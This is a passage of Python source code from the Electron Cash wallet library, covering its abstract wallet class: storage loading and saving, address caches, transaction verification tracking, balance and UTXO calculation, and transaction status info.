tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
fee = config.estimate_fee(tx.estimated_size())
if total - fee < 0:
raise NotEnoughFunds(_('Not enough funds on address.') + '\nTotal: %d satoshis\nFee: %d'%(total, fee))
if total - fee < dust_threshold(network):
raise NotEnoughFunds(_('Not enough funds on address.') + '\nTotal: %d satoshis\nFee: %d\nDust Threshold: %d'%(total, fee, dust_threshold(network)))
outputs = [(bitcoin.TYPE_ADDRESS, recipient, total - fee)]
locktime = network.get_local_height()
tx = Transaction.from_io(inputs, outputs, locktime=locktime, sign_schnorr=sign_schnorr)
tx.BIP_LI01_sort()
tx.sign(keypairs)
return tx
class Abstract_Wallet(PrintError, SPVDelegate):
"""
Wallet classes are created to handle various address generation methods.
Completion states (watching-only, single account, no seed, etc) are handled inside classes.
"""
max_change_outputs = 3
def __init__(self, storage):
self.electrum_version = PACKAGE_VERSION
self.storage = storage
self.thread = None # this is used by the qt main_window to store a QThread. We just make sure it's always defined as an attribute here.
self.network = None
# verifier (SPV) and synchronizer are started in start_threads
self.synchronizer = None
self.verifier = None
self.weak_window = None # Some of the GUI classes, such as the Qt ElectrumWindow, use this to refer back to themselves. This should always be a weakref.ref (Weak.ref), or None
# CashAccounts subsystem. Its network-dependent layer is started in
# start_threads. Note: object instantiation should be lightweight here.
# self.cashacct.load() is called later in this function to load data.
self.cashacct = cashacct.CashAcct(self)
self.slp = slp.WalletData(self)
finalization_print_error(self.cashacct) # debug object lifecycle
finalization_print_error(self.slp) # debug object lifecycle
# Removes defunct entries from self.pruned_txo asynchronously
self.pruned_txo_cleaner_thread = None
# Cache of Address -> (c,u,x) balance. This cache is used by
# get_addr_balance to significantly speed it up (it is called a lot).
# Cache entries are invalidated when tx's are seen involving this
# address (address history chages). Entries to this cache are added
# only inside get_addr_balance.
# Note that this data structure is touched by the network and GUI
# thread concurrently without the use of locks, because Python GIL
# allows us to get away with such things. As such do not iterate over
# this dict, but simply add/remove items to/from it in 1-liners (which
# Python's GIL makes thread-safe implicitly).
self._addr_bal_cache = {}
# We keep a set of the wallet and receiving addresses so that is_mine()
# checks are O(logN) rather than O(N). This creates/resets that cache.
self.invalidate_address_set_cache()
self.gap_limit_for_change = 20 # constant
# saved fields
self.use_change = storage.get('use_change', True)
self.multiple_change = storage.get('multiple_change', False)
self.labels = storage.get('labels', {})
# Frozen addresses
frozen_addresses = storage.get('frozen_addresses',[])
self.frozen_addresses = set(Address.from_string(addr)
for addr in frozen_addresses)
# Frozen coins (UTXOs) -- note that we have 2 independent levels of "freezing": address-level and coin-level.
# The two types of freezing are flagged independently of each other and 'spendable' is defined as a coin that satisfies
# BOTH levels of freezing.
self.frozen_coins = set(storage.get('frozen_coins', []))
self.frozen_coins_tmp = set() # in-memory only
self.change_reserved = set(Address.from_string(a) for a in storage.get('change_reserved', ()))
self.change_reserved_default = [Address.from_string(a) for a in storage.get('change_reserved_default', ())]
self.change_unreserved = [Address.from_string(a) for a in storage.get('change_unreserved', ())]
self.change_reserved_tmp = set() # in-memory only
# address -> list(txid, height)
history = storage.get('addr_history',{})
self._history = self.to_Address_dict(history)
# there is a difference between wallet.up_to_date and interface.is_up_to_date()
# interface.is_up_to_date() returns true when all requests have been answered and processed
# wallet.up_to_date is true when the wallet is synchronized (stronger requirement)
self.up_to_date = False
# The only lock. We used to have two here. That was more technical debt
# without much purpose. 1 lock is sufficient. In particular data
# structures that are touched by the network thread as well as the GUI
# (such as self.transactions, history, etc) need to be synchronized
# using this mutex.
self.lock = threading.RLock()
# load requests
requests = self.storage.get('payment_requests', {})
for key, req in requests.items():
req['address'] = Address.from_string(key)
self.receive_requests = {req['address']: req
for req in requests.values()}
# Transactions pending verification. A map from tx hash to transaction
# height. Access is contended so a lock is needed. Client code should
# use get_unverified_tx to get a thread-safe copy of this dict.
self.unverified_tx = defaultdict(int)
# Verified transactions. Each value is a (height, timestamp, block_pos) tuple. Access with self.lock.
self.verified_tx = storage.get('verified_tx3', {})
# save wallet type the first time
if self.storage.get('wallet_type') is None:
self.storage.put('wallet_type', self.wallet_type)
# invoices and contacts
self.invoices = InvoiceStore(self.storage)
self.contacts = Contacts(self.storage)
# cashacct is started in start_threads, but it needs to have relevant
# data here, before the below calls happen
self.cashacct.load()
self.slp.load() # try to load first so we can pick up the remove_transaction hook from load_transactions if need be
# Now, finally, after object is constructed -- we can do this
self.load_keystore_wrapper()
self.load_addresses()
self.load_transactions()
self.build_reverse_history()
self.check_history()
if self.slp.need_rebuild:
# load failed, must rebuild from self.transactions
self.slp.rebuild()
self.slp.save() # commit changes to self.storage
# Print debug message on finalization
finalization_print_error(self, "[{}/{}] finalized".format(type(self).__name__, self.diagnostic_name()))
@classmethod
def to_Address_dict(cls, d):
'''Convert a dict of strings to a dict of Adddress objects.'''
return {Address.from_string(text): value for text, value in d.items()}
@classmethod
def from_Address_dict(cls, d):
'''Convert a dict of Address objects to a dict of strings.'''
return {addr.to_storage_string(): value
for addr, value in d.items()}
def diagnostic_name(self):
return self.basename()
def __str__(self):
return self.basename()
def get_master_public_key(self):
return None
def load_keystore_wrapper(self):
""" Loads the keystore, but also tries to preserve derivation(s). Older
Electron Cash versions would not save the derivation for all keystore
types. So this function ensures:
1. That on first run, we store the keystore_derivations to top-level
storage (which is preserved always).
2. On subsequent runs we try and load the keystore_derivations from
storage and restore them if the individual keystore.derivation data
items were lost (because user loaded wallet with older Electron
Cash).
This function is provided to allow users to switch between old and new
EC versions. In the future if we deprecate the wallet format, or if
enough time has passed, this function may be removed and the simple
self.load_keystore() may be used instead. """
self.load_keystore()
if not hasattr(self, 'get_keystores'):
return
from .keystore import Deterministic_KeyStore, Old_KeyStore
keystores = self.get_keystores()
keystore_derivations = self.storage.get('keystore_derivations', [])
if len(keystore_derivations) != len(keystores):
keystore_derivations = [None] * len(keystores)
updated, updated_ks, updated_st = False, False, False
for i, keystore in enumerate(keystores):
if i == 0 and isinstance(keystore, Deterministic_KeyStore) and not keystore.seed_type:
# Attempt to update keystore.seed_type
if isinstance(keystore, Old_KeyStore):
keystore.seed_type = 'old'
updated_st = True
else:
# attempt to restore the seed_type based on wallet saved "seed_type"
typ = self.storage.get('seed_type')
if typ in ('standard', 'electrum'):
keystore.seed_type = 'electrum'
updated_st = True
elif typ == 'bip39':
keystore.seed_type = 'bip39'
updated_st = True
saved_der = keystore_derivations[i]
der = (keystore.has_derivation() and keystore.derivation) or None
if der != saved_der:
if der:
# keystore had a derivation, but top-level storage did not
# (this branch is typically taken on first run after
# restoring from seed or creating a new wallet)
keystore_derivations[i] = saved_der = der
updated = True
elif saved_der:
# we had a derivation but keystore did not. This branch is
# taken if the user has loaded this wallet with an older
# version of Electron Cash. Attempt to restore their
# derivation item in keystore.
keystore.derivation = der # write to keystore
updated_ks = True # tell it to re-save
if updated:
self.print_error("Updated keystore_derivations")
self.storage.put('keystore_derivations', keystore_derivations)
if updated_ks or updated_st:
if updated_ks:
self.print_error("Updated keystore (lost derivations restored)")
if updated_st:
self.print_error("Updated keystore (lost seed_type restored)")
self.save_keystore()
if any((updated, updated_ks, updated_st)):
self.storage.write()
@profiler
def load_transactions(self):
txi = self.storage.get('txi', {})
self.txi = {tx_hash: self.to_Address_dict(value)
for tx_hash, value in txi.items()
# skip empty entries to save memory and disk space
if value}
txo = self.storage.get('txo', {})
self.txo = {tx_hash: self.to_Address_dict(value)
for tx_hash, value in txo.items()
# skip empty entries to save memory and disk space
if value}
self.tx_fees = self.storage.get('tx_fees', {})
self.pruned_txo = self.storage.get('pruned_txo', {})
self.pruned_txo_values = set(self.pruned_txo.values())
tx_list = self.storage.get('transactions', {})
self.transactions = {}
for tx_hash, raw in tx_list.items():
tx = Transaction(raw)
self.transactions[tx_hash] = tx
if not self.txi.get(tx_hash) and not self.txo.get(tx_hash) and (tx_hash not in self.pruned_txo_values):
self.print_error("removing unreferenced tx", tx_hash)
self.transactions.pop(tx_hash)
self.cashacct.remove_transaction_hook(tx_hash)
self.slp.rm_tx(tx_hash)
@profiler
def save_transactions(self, write=False):
with self.lock:
tx = {}
for k,v in self.transactions.items():
tx[k] = str(v)
self.storage.put('transactions', tx)
txi = {tx_hash: self.from_Address_dict(value)
for tx_hash, value in self.txi.items()
# skip empty entries to save memory and disk space
if value}
txo = {tx_hash: self.from_Address_dict(value)
for tx_hash, value in self.txo.items()
# skip empty entries to save memory and disk space
if value}
self.storage.put('txi', txi)
self.storage.put('txo', txo)
self.storage.put('tx_fees', self.tx_fees)
self.storage.put('pruned_txo', self.pruned_txo)
history = self.from_Address_dict(self._history)
self.storage.put('addr_history', history)
self.slp.save()
if write:
self.storage.write()
def save_verified_tx(self, write=False):
with self.lock:
self.storage.put('verified_tx3', self.verified_tx)
self.cashacct.save()
if write:
self.storage.write()
def save_change_reservations(self):
with self.lock:
self.storage.put('change_reserved_default', [a.to_storage_string() for a in self.change_reserved_default])
self.storage.put('change_reserved', [a.to_storage_string() for a in self.change_reserved])
unreserved = self.change_unreserved + list(self.change_reserved_tmp)
self.storage.put('change_unreserved', [a.to_storage_string() for a in unreserved])
def clear_history(self):
with self.lock:
self.txi = {}
self.txo = {}
self.tx_fees = {}
self.pruned_txo = {}
self.pruned_txo_values = set()
self.slp.clear()
self.save_transactions()
self._addr_bal_cache = {}
self._history = {}
self.tx_addr_hist = defaultdict(set)
self.cashacct.on_clear_history()
@profiler
def build_reverse_history(self):
self.tx_addr_hist = defaultdict(set)
for addr, hist in self._history.items():
for tx_hash, h in hist:
self.tx_addr_hist[tx_hash].add(addr)
@profiler
def check_history(self):
save = False
my_addrs = [addr for addr in self._history if self.is_mine(addr)]
for addr in set(self._history) - set(my_addrs):
self._history.pop(addr)
save = True
for addr in my_addrs:
hist = self._history[addr]
for tx_hash, tx_height in hist:
if tx_hash in self.pruned_txo_values or self.txi.get(tx_hash) or self.txo.get(tx_hash):
continue
tx = self.transactions.get(tx_hash)
if tx is not None:
self.add_transaction(tx_hash, tx)
save = True
if save:
self.save_transactions()
self.cashacct.save()
def basename(self):
return os.path.basename(self.storage.path)
def save_addresses(self):
addr_dict = {
'receiving': [addr.to_storage_string()
for addr in self.receiving_addresses],
'change': [addr.to_storage_string()
for addr in self.change_addresses],
}
self.storage.put('addresses', addr_dict)
def load_addresses(self):
d = self.storage.get('addresses', {})
if not isinstance(d, dict):
d = {}
self.receiving_addresses = Address.from_strings(d.get('receiving', []))
self.change_addresses = Address.from_strings(d.get('change', []))
def synchronize(self):
pass
def is_deterministic(self):
return self.keystore.is_deterministic()
def set_up_to_date(self, up_to_date):
with self.lock:
self.up_to_date = up_to_date
if up_to_date:
self.save_addresses()
self.save_transactions()
# if the verifier is also up to date, persist that too;
# otherwise it will persist its results when it finishes
if self.verifier and self.verifier.is_up_to_date():
self.save_verified_tx()
self.storage.write()
def is_up_to_date(self):
with self.lock: return self.up_to_date
def is_fully_settled_down(self):
''' Returns True iff the wallet is up to date and its synchronizer
and verifier aren't busy doing work, and its pruned_txo_values list
is currently empty. This is used as a final check by the Qt GUI
to decide if it should do a final refresh of all tabs in some cases.'''
with self.lock:
ret = self.up_to_date
if ret and self.verifier:
ret = self.verifier.is_up_to_date()
if ret and self.synchronizer:
ret = self.synchronizer.is_up_to_date()
ret = ret and not self.pruned_txo_values
return bool(ret)
def set_label(self, name, text = None):
with self.lock:
if isinstance(name, Address):
name = name.to_storage_string()
changed = False
old_text = self.labels.get(name)
if text:
text = text.replace("\n", " ")
if old_text != text:
self.labels[name] = text
changed = True
else:
if old_text:
self.labels.pop(name)
changed = True
if changed:
run_hook('set_label', self, name, text)
self.storage.put('labels', self.labels)
return changed
def invalidate_address_set_cache(self):
"""This should be called from functions that add/remove addresses
from the wallet to ensure the address set caches are empty, in
particular from ImportedWallets which may add/delete addresses
thus the length check in is_mine() may not be accurate.
Deterministic wallets can neglect to call this function since their
address sets only grow and never shrink and thus the length check
of is_mine below is sufficient."""
self._recv_address_set_cached, self._change_address_set_cached = frozenset(), frozenset()
def is_mine(self, address):
"""Note this method assumes that the entire address set is
composed of self.get_change_addresses() + self.get_receiving_addresses().
In subclasses, if that is not the case -- REIMPLEMENT this method!"""
assert not isinstance(address, str)
# assumption here is get_receiving_addresses and get_change_addresses
# are cheap constant-time operations returning a list reference.
# If that is not the case -- reimplement this function.
ra, ca = self.get_receiving_addresses(), self.get_change_addresses()
# Detect if sets changed (addresses added/removed).
# Note the functions that add/remove addresses should invalidate this
# cache using invalidate_address_set_cache() above.
if len(ra) != len(self._recv_address_set_cached):
# re-create cache if lengths don't match
self._recv_address_set_cached = frozenset(ra)
if len(ca) != len(self._change_address_set_cached):
# re-create cache if lengths don't match
self._change_address_set_cached = frozenset(ca)
# Do a 2 x O(logN) lookup using sets rather than 2 x O(N) lookups
# if we were to use the address lists (this was the previous way).
# For small wallets it doesn't matter -- but for wallets with 5k or 10k
# addresses, it starts to add up siince is_mine() is called frequently
# especially while downloading address history.
return (address in self._recv_address_set_cached
or address in self._change_address_set_cached)
def is_change(self, address):
assert not isinstance(address, str)
ca = self.get_change_addresses()
if len(ca) != len(self._change_address_set_cached):
# re-create cache if lengths don't match
self._change_address_set_cached = frozenset(ca)
return address in self._change_address_set_cached
def get_address_index(self, address):
try:
return False, self.receiving_addresses.index(address)
except ValueError:
pass
try:
return True, self.change_addresses.index(address)
except ValueError:
pass
assert not isinstance(address, str)
raise Exception("Address {} not found".format(address))
def export_private_key(self, address, password):
""" extended WIF format """
if self.is_watching_only():
return []
index = self.get_address_index(address)
pk, compressed = self.keystore.get_private_key(index, password)
return bitcoin.serialize_privkey(pk, compressed, self.txin_type)
def get_public_keys(self, address):
sequence = self.get_address_index(address)
return self.get_pubkeys(*sequence)
def add_unverified_tx(self, tx_hash, tx_height):
with self.lock:
if tx_height == 0 and tx_hash in self.verified_tx:
self.verified_tx.pop(tx_hash)
if self.verifier:
self.verifier.merkle_roots.pop(tx_hash, None)
# tx will be verified only if height > 0
if tx_hash not in self.verified_tx:
self.unverified_tx[tx_hash] = tx_height
self.cashacct.add_unverified_tx_hook(tx_hash, tx_height)
def add_verified_tx(self, tx_hash, info, header):
# Remove from the unverified map and add to the verified map and
with self.lock:
self.unverified_tx.pop(tx_hash, None)
self.verified_tx[tx_hash] = info # (tx_height, timestamp, pos)
height, conf, timestamp = self.get_tx_height(tx_hash)
self.cashacct.add_verified_tx_hook(tx_hash, info, header)
self.network.trigger_callback('verified2', self, tx_hash, height, conf, timestamp)
def verification_failed(self, tx_hash, reason):
''' TODO: Notify gui of this if it keeps happening, try a different
server, rate-limited retries, etc '''
self.cashacct.verification_failed_hook(tx_hash, reason)
def get_unverified_txs(self):
'''Returns a map from tx hash to transaction height'''
with self.lock:
return self.unverified_tx.copy()
def get_unverified_tx_pending_count(self):
''' Returns the number of unverified tx's that are confirmed and are
still in process and should be verified soon.'''
with self.lock:
return len([1 for height in self.unverified_tx.values() if height > 0])
def undo_verifications(self, blockchain, height):
'''Used by the verifier when a reorg has happened'''
txs = set()
with self.lock:
for tx_hash, item in list(self.verified_tx.items()):
tx_height, timestamp, pos = item
if tx_height >= height:
header = blockchain.read_header(tx_height)
# fixme: use block hash, not timestamp
if not header or header.get('timestamp') != timestamp:
self.verified_tx.pop(tx_hash, None)
txs.add(tx_hash)
if txs: self.cashacct.undo_verifications_hook(txs)
if txs:
self._addr_bal_cache = {} # this is probably not necessary -- as the receive_history_callback will invalidate bad cache items -- but just to be paranoid we clear the whole balance cache on reorg anyway as a safety measure
return txs
def get_local_height(self):
""" return last known height if we are offline """
return self.network.get_local_height() if self.network else self.storage.get('stored_height', 0)
def get_tx_height(self, tx_hash):
""" return the height and timestamp of a verified transaction. """
with self.lock:
if tx_hash in self.verified_tx:
height, timestamp, pos = self.verified_tx[tx_hash]
conf = max(self.get_local_height() - height + 1, 0)
return height, conf, timestamp
elif tx_hash in self.unverified_tx:
height = self.unverified_tx[tx_hash]
return height, 0, 0
else:
return 0, 0, 0
def get_tx_block_hash(self, tx_hash):
''' Only works for tx's in wallet, for which we know the height. '''
height, ign, ign2 = self.get_tx_height(tx_hash)
return self.get_block_hash(height)
def get_block_hash(self, height):
'''Convenience method equivalent to Blockchain.get_height(), except our
version returns None instead of NULL_HASH_HEX on 'not found' header. '''
ret = None
if self.network and height is not None and height >= 0 and height <= self.get_local_height():
bchain = self.network.blockchain()
if bchain:
ret = bchain.get_hash(height)
if ret == NULL_HASH_HEX:
# if hash was NULL (all zeroes), prefer to return None
ret = None
return ret
def get_txpos(self, tx_hash):
"return position, even if the tx is unverified"
with self.lock:
if tx_hash in self.verified_tx:
height, timestamp, pos = self.verified_tx[tx_hash]
return height, pos
elif tx_hash in self.unverified_tx:
height = self.unverified_tx[tx_hash]
return (height, 0) if height > 0 else ((1e9 - height), 0)
else:
return (1e9+1, 0)
def is_found(self):
return any(value for value in self._history.values())
def get_num_tx(self, address):
""" return number of transactions where address is involved """
return len(self.get_address_history(address))
def get_tx_delta(self, tx_hash, address):
assert isinstance(address, Address)
"effect of tx on address"
# pruned
if tx_hash in self.pruned_txo_values:
return None
delta = 0
# substract the value of coins sent from address
d = self.txi.get(tx_hash, {}).get(address, [])
for n, v in d:
delta -= v
# add the value of the coins received at address
d = self.txo.get(tx_hash, {}).get(address, [])
for n, v, cb in d:
delta += v
return delta
WalletDelta = namedtuple("WalletDelta", "is_relevant, is_mine, v, fee")
WalletDelta2 = namedtuple("WalletDelta2", WalletDelta._fields + ("spends_coins_mine",))
def get_wallet_delta(self, tx) -> WalletDelta:
return self._get_wallet_delta(tx, ver=1)
def _get_wallet_delta(self, tx, *, ver=1) -> Union[WalletDelta, WalletDelta2]:
""" Effect of tx on wallet """
assert ver in (1, 2)
is_relevant = False
is_mine = False
is_pruned = False
is_partial = False
v_in = v_out = v_out_mine = 0
spends_coins_mine = list()
for item in tx.inputs():
addr = item['address']
if self.is_mine(addr):
is_mine = True
is_relevant = True
prevout_hash = item['prevout_hash']
prevout_n = item['prevout_n']
d = self.txo.get(prevout_hash, {}).get(addr, [])
for n, v, cb in d:
if n == prevout_n:
value = v
if ver == 2:
spends_coins_mine.append(f'{prevout_hash}:{prevout_n}')
break
else:
value = None
if value is None:
is_pruned = True
else:
v_in += value
else:
is_partial = True
if not is_mine:
is_partial = False
for _type, addr, value in tx.outputs():
v_out += value
if self.is_mine(addr):
v_out_mine += value
is_relevant = True
if is_pruned:
# some inputs are mine:
fee = None
if is_mine:
v = v_out_mine - v_out
else:
# no input is mine
v = v_out_mine
else:
v = v_out_mine - v_in
if is_partial:
# some inputs are mine, but not all
fee = None
else:
# all inputs are mine
fee = v_in - v_out
if not is_mine:
fee = None
if ver == 1:
return self.WalletDelta(is_relevant, is_mine, v, fee)
return self.WalletDelta2(is_relevant, is_mine, v, fee, spends_coins_mine)
TxInfo = namedtuple("TxInfo", "tx_hash, status, label, can_broadcast, amount, fee, height, conf, timestamp, exp_n")
class StatusEnum(Enum):
Unconfirmed = auto()
NotVerified = auto()
Confirmed = auto()
Signed = auto()
Unsigned = auto()
PartiallySigned = auto()
TxInfo2 = namedtuple("TxInfo2", TxInfo._fields + ("status_enum",))
def get_tx_info(self, tx) -> TxInfo:
""" Return information for a transaction """
return self._get_tx_info(tx, self.get_wallet_delta(tx), ver=1)
def get_tx_extended_info(self, tx) -> Tuple[WalletDelta2, TxInfo2]:
""" Get extended information for a transaction, combined into 1 call (for performance) """
delta2 = self._get_wallet_delta(tx, ver=2)
info2 = self._get_tx_info(tx, delta2, ver=2)
return (delta2, info2)
def _get_tx_info(self, tx, delta, *, ver=1) -> Union[TxInfo, TxInfo2]:
""" get_tx_info implementation """
assert ver in (1, 2)
if isinstance(delta, self.WalletDelta):
is_relevant, is_mine, v, fee = delta
else:
is_relevant, is_mine, v, fee, __ = delta
exp_n = None
can_broadcast = False
label = ''
height = conf = timestamp = None
status_enum = None
tx_hash = tx.txid()
if tx.is_complete():
if tx_hash in self.transactions:
label = self.get_label(tx_hash)
height, conf, timestamp = self.get_tx_height(tx_hash)
if height > 0:
if conf:
status = ngettext("{conf} confirmation", "{conf} confirmations", conf).format(conf=conf)
status_enum = self.StatusEnum.Confirmed
else:
status = _('Not verified')
status_enum = self.StatusEnum.NotVerified
else:
status = _('Unconfirmed')
status_enum = self.StatusEnum.Unconfirmed
if fee is None:
fee = self.tx_fees.get(tx_hash)
else:
status = _("Signed")
status_enum = self.StatusEnum.Signed
can_broadcast = self.network is not None
else:
s, r = tx.signature_count()
if s == 0:
status = _("Unsigned")
status_enum = self.StatusEnum.Unsigned
else:
status =_('Partially signed') + ' (%d/%d)'%(s,r)
status_enum = self.StatusEnum.PartiallySigned
if is_relevant:
if is_mine:
if fee is not None:
amount = v + fee
else:
amount = v
else:
amount = v
else:
amount = None
if ver == 1:
return self.TxInfo(tx_hash, status, label, can_broadcast, amount, fee, height, conf, timestamp, exp_n)
assert status_enum is not None
return self.TxInfo2(tx_hash, status, label, can_broadcast, amount, fee, height, conf, timestamp, exp_n,
status_enum)
def get_addr_io(self, address):
h = self.get_address_history(address)
received = {}
sent = {}
for tx_hash, height in h:
l = self.txo.get(tx_hash, {}).get(address, [])
for n, v, is_cb in l:
received[tx_hash + ':%d'%n] = (height, v, is_cb)
for tx_hash, height in h:
l = self.txi.get(tx_hash, {}).get(address, [])
for txi, v in l:
sent[txi] = height
return received, sent
def get_addr_utxo(self, address):
coins, spent = self.get_addr_io(address)
for txi in spent:
coins.pop(txi)
# cleanup/detect if the 'frozen coin' was spent and remove it from the frozen coin set
self.frozen_coins.discard(txi)
self.frozen_coins_tmp.discard(txi)
out = {}
for txo, v in coins.items():
tx_height, value, is_cb = v
prevout_hash, prevout_n = txo.split(':')
x = {
'address':address,
'value':value,
'prevout_n':int(prevout_n),
'prevout_hash':prevout_hash,
'height':tx_height,
'coinbase':is_cb,
'is_frozen_coin':txo in self.frozen_coins or txo in self.frozen_coins_tmp,
'slp_token':self.slp.token_info_for_txo(txo), # (token_id_hex, qty) tuple or None
}
out[txo] = x
return out
# return the total amount ever received by an address
def get_addr_received(self, address):
received, sent = self.get_addr_io(address)
return sum([v for height, v, is_cb in received.values()])
def get_addr_balance(self, address, exclude_frozen_coins=False):
''' Returns the balance of a bitcoin address as a tuple of:
(confirmed_matured, unconfirmed, unmatured)
Note that 'exclude_frozen_coins = True' only checks for coin-level
freezing, not address-level. '''
assert isinstance(address, Address)
mempoolHeight = self.get_local_height() + 1
if not exclude_frozen_coins: # we do not use the cache when excluding frozen coins as frozen status is a dynamic quantity that can change at any time in the UI
cached = self._addr_bal_cache.get(address)
if cached is not None:
return cached
received, sent = self.get_addr_io(address)
c = u = x = 0
had_cb = False
for txo, (tx_height, v, is_cb) in received.items():
if exclude_frozen_coins and (txo in self.frozen_coins or txo in self.frozen_coins_tmp):
continue
had_cb = had_cb or is_cb # remember if this address has ever seen a coinbase txo
if is_cb and tx_height + bitcoin.COINBASE_MATURITY > mempoolHeight:
x += v
elif tx_height > 0:
c += v
else:
u += v
if txo in sent:
if sent[txo] > 0:
c -= v
else:
u -= v
result = c, u, x
if not exclude_frozen_coins and not had_cb:
# Cache the results.
# Cache needs to be invalidated if a transaction is added to/
# removed from addr history. (See self._addr_bal_cache calls
# related to this littered throughout this file).
#
# Note that as a performance tweak we don't ever cache balances for
# addresses involving coinbase coins. The rationale being as
# follows: Caching of balances of the coinbase addresses involves
# a dynamic quantity: maturity of the coin (which considers the
# ever-changing block height).
#
# There wasn't a good place in this codebase to signal the maturity
# happening (and thus invalidate the cache entry for the exact
# address that holds the coinbase coin in question when a new
# block is found that matures a coinbase coin).
#
# In light of that fact, a possible approach would be to invalidate
# this entire cache when a new block arrives (this is what Electrum
# does). However, for Electron Cash with its focus on many addresses
# for future privacy features such as integrated CashShuffle --
# being notified in the wallet and invalidating the *entire* cache
# whenever a new block arrives (which is the exact time you do
# the most GUI refreshing and calling of this function) seems a bit
# heavy-handed, just for sake of the (relatively rare, for the
# average user) coinbase-carrying addresses.
#
# It's not a huge performance hit for the coinbase addresses to
# simply not cache their results, and have this function recompute
# their balance on each call, when you consider that as a
# consequence of this policy, all the other addresses that are
# non-coinbase can benefit from a cache that stays valid for longer
# than 1 block (so long as their balances haven't changed).
self._addr_bal_cache[address] = result
return result
def get_spendable_coins(self, domain, config, isInvoice = False):
confirmed_only = config.get('confirmed_only', DEFAULT_CONFIRMED_ONLY)
if (isInvoice):
confirmed_only = True
return self.get_utxos(domain, exclude_frozen=True, mature=True, confirmed_only=confirmed_only, exclude_slp=True)
def get_utxos(self, domain = None, exclude_frozen = False, mature = False, confirmed_only = False,
*, addr_set_out = None, exclude_slp = True):
'''Note that exclude_frozen = True checks for BOTH address-level and
coin-level frozen status.
exclude_slp skips coins that also have SLP tokens on them. This defaults
to True in EC 4.0.10+ in order to prevent inadvertently burning tokens.
Optional kw-only arg `addr_set_out` specifies a set in which to add all
addresses encountered in the utxos returned. '''
with self.lock:
mempoolHeight = self.get_local_height() + 1
coins = []
if domain is None:
domain = self.get_addresses()
if exclude_frozen:
domain = set(domain) - self.frozen_addresses
for addr in domain:
utxos = self.get_addr_utxo(addr)
len_before = len(coins)
for x in utxos.values():
if exclude_slp and x['slp_token']:
continue
if exclude_frozen and x['is_frozen_coin']:
continue
if confirmed_only and x['height'] <= 0:
continue
# A note about maturity: Previous versions of Electrum
# and Electron Cash were off by one. Maturity is
# calculated based off mempool height (chain tip height + 1).
# See bitcoind consensus/tx_verify.cpp Consensus::CheckTxInputs
# and also txmempool.cpp CTxMemPool::removeForReorg.
if mature and x['coinbase'] and mempoolHeight - x['height'] < bitcoin.COINBASE_MATURITY:
continue
coins.append(x)
if addr_set_out is not None and len(coins) > len_before:
# add this address to the address set if it has results
addr_set_out.add(addr)
return coins
def dummy_address(self):
return self.get_receiving_addresses()[0]
def get_addresses(self):
return self.get_receiving_addresses() + self.get_change_addresses()
def get_change_addresses(self):
''' Reimplemented in subclasses for wallets that have a change address set/derivation path. '''
return []
def get_frozen_balance(self):
if not self.frozen_coins and not self.frozen_coins_tmp:
# performance short-cut -- get the balance of the frozen address set only IFF we don't have any frozen coins
return self.get_balance(self.frozen_addresses)
# otherwise, do this more costly calculation...
cc_no_f, uu_no_f, xx_no_f = self.get_balance(None, exclude_frozen_coins = True, exclude_frozen_addresses = True)
cc_all, uu_all, xx_all = self.get_balance(None, exclude_frozen_coins = False, exclude_frozen_addresses = False)
return (cc_all-cc_no_f), (uu_all-uu_no_f), (xx_all-xx_no_f)
def get_balance(self, domain=None, exclude_frozen_coins=False, exclude_frozen_addresses=False):
if domain is None:
domain = self.get_addresses()
if exclude_frozen_addresses:
domain = set(domain) - self.frozen_addresses
cc = uu = xx = 0
for addr in domain:
c, u, x = self.get_addr_balance(addr, exclude_frozen_coins)
cc += c
uu += u
xx += x
return cc, uu, xx
def get_address_history(self, address):
assert isinstance(address, Address)
return self._history.get(address, [])
def _clean_pruned_txo_thread(self):
''' Runs in the thread self.pruned_txo_cleaner_thread which is only
active if self.network. Cleans the self.pruned_txo dict and the
self.pruned_txo_values set of spends that are not relevant to the
wallet. The processing below is needed because as of 9/16/2019, Electron
Cash temporarily puts all spends that pass through add_transaction and
have an unparseable address (txi['address'] is None) into the dict
self.pruned_txo. This is necessary for handling tx's with esoteric p2sh
scriptSigs and detecting balance changes properly for txins
containing such scriptSigs. See #895. '''
def deser(ser):
prevout_hash, prevout_n = ser.split(':')
prevout_n = int(prevout_n)
return prevout_hash, prevout_n
def mkser(prevout_hash, prevout_n):
return f'{prevout_hash}:{prevout_n}'
def rm(ser, pruned_too=True, *, tup = None):
h, n = tup or deser(ser) # tup arg is for performance when caller already knows the info (avoid a redundant .split on ':')
s = txid_n[h]
s.discard(n)
if not s:
txid_n.pop(h, None)
if pruned_too:
with self.lock:
tx_hash = self.pruned_txo.pop(ser, None)
self.pruned_txo_values.discard(tx_hash)
def add(ser):
prevout_hash, prevout_n = deser(ser)
txid_n[prevout_hash].add(prevout_n)
def keep_running():
return bool(self.network and self.pruned_txo_cleaner_thread is me)
def can_do_work():
return bool(txid_n and self.is_up_to_date())
debug = False # set this to true here to get more verbose output
me = threading.current_thread()
q = me.q
me.txid_n = txid_n = defaultdict(set) # dict of prevout_hash -> set of prevout_n (int)
last = time.time()
try:
self.print_error(f"{me.name}: thread started")
with self.lock:
# Setup -- grab whatever was already in pruned_txo at thread
# start
for ser in self.pruned_txo:
h, n = deser(ser)
txid_n[h].add(n)
while keep_running():
try:
ser = q.get(timeout=5.0 if can_do_work() else 20.0)
if ser is None:
# quit thread
return
if ser.startswith('r_'):
# remove requested
rm(ser[2:], False)
else:
# ser was added
add(ser)
del ser
except queue.Empty:
pass
if not can_do_work():
continue
t0 = time.time()
if t0 - last < 1.0: # run no more often than once per second
continue
last = t0
defunct_ct = 0
for prevout_hash, s in txid_n.copy().items():
for prevout_n in s.copy():
ser = mkser(prevout_hash, prevout_n)
with self.lock:
defunct = ser not in self.pruned_txo
if defunct:
#self.print_error(f"{me.name}: skipping already-cleaned", ser)
rm(ser, False, tup=(prevout_hash, prevout_n))
defunct_ct += 1
continue
if defunct_ct and debug:
self.print_error(f"{me.name}: DEBUG", defunct_ct, "defunct txos removed in", time.time()-t0, "secs")
ct = 0
for prevout_hash, s in txid_n.copy().items():
try:
with self.lock:
tx = self.transactions.get(prevout_hash)
if tx is None:
tx = Transaction.tx_cache_get(prevout_hash)
if isinstance(tx, Transaction):
tx = Transaction(tx.raw) # take a copy
else:
if debug: self.print_error(f"{me.name}: DEBUG retrieving txid", prevout_hash, "...")
t1 = time.time()
tx = Transaction(self.network.synchronous_get(('blockchain.transaction.get', [prevout_hash])))
if debug: self.print_error(f"{me.name}: DEBUG network retrieve took", time.time()-t1, "secs")
